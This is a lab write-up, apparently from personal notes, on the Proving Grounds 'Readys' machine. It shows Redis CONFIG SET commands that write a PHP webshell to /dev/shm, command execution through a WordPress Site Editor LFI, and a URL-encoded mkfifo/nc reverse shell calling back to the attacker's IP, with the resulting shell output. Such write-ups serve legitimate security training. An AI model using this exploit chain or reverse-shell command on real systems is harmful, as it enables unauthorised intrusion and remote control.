RCE via Redis and LFI

Considering a LFI vulnerability is present in the target WordPress instance, it is possible to achieve code execution by leveraging the target Redis instance to write a malicious PHP file anywhere on the target system where write access is available. Since the LFI vulnerability allows arbitrary file inclusion, the malicious PHP file can then be accessed and executed through this vulnerability, enabling remote code execution. This approach circumvents the need to write directly to the web directory, expanding the attack surface and increasing the potential for system compromise.

Web Root Directory (Fail)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' CONFIG SET dir /var/www/html
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' CONFIG SET dbfilename webshell.php
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ cat webshell.php | redis-cli -h $IP --pass 'Ready4Redis?' -x SET webshell           
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' SAVE                           
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
(error) ERR

The initial attempt to write to the web root directory failed. This is likely caused by not having write access to the directory

World-writable /dev/shm

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' FLUSHALL
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK

Clearing the previous attempt

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' CONFIG SET dir /dev/shm
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' CONFIG SET dbfilename webshell.php
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ cat webshell.php | redis-cli -h $IP --pass 'Ready4Redis?' -x SET webshell
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' SAVE
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK

Changing the dir attribute to the world-writable /dev/shm directory

LFI

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ curl --output - "http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/dev/shm/webshell.php&cmd=id"
REDIS0009�	redis-ver5.0.14�
�edis-bits�@�ctime�e��gused-mem°
 aof-preamble��webshelluid=1000(alice) gid=1000(alice) groups=1000(alice)
����R�(��{"success":true,"data":{"output":[]}}

Code execution confirmed

Shell

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ curl --output - "http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/dev/shm/webshell.php&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%20192.168.45.218%209999%20%3E%2Ftmp%2Ff"

Sending a reverse shell

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ nnc 9999       
listening on [any] 9999 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.166] 33194
bash: cannot set terminal process group (526): Inappropriate ioctl for device
bash: no job control in this shell
<ite-editor/editor/extensions/pagebuilder/includes$ whoami
whoami
alice
<ite-editor/editor/extensions/pagebuilder/includes$ hostname
hostname
readys
<ite-editor/editor/extensions/pagebuilder/includes$ ifconfig
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.154.166  netmask 255.255.255.0  broadcast 192.168.154.255
        inet6 fe80::250:56ff:fe9e:6e4b  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:9e:6e:4b  txqueuelen 1000  (Ethernet)
        RX packets 856  bytes 85629 (83.6 KiB)
        RX errors 0  dropped 60  overruns 0  frame 0
        TX packets 211  bytes 22052 (21.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the alice user via leveraging Redis and LFI Jumping to the lateral movement

InfoSec LAB

Explorer

Readys_Exploitation_3

RCE via Redis and LFI

Web Root Directory (Fail)

World-writable /dev/shm

LFI

Shell

Interactive Graph View

Table of Contents

Backlinks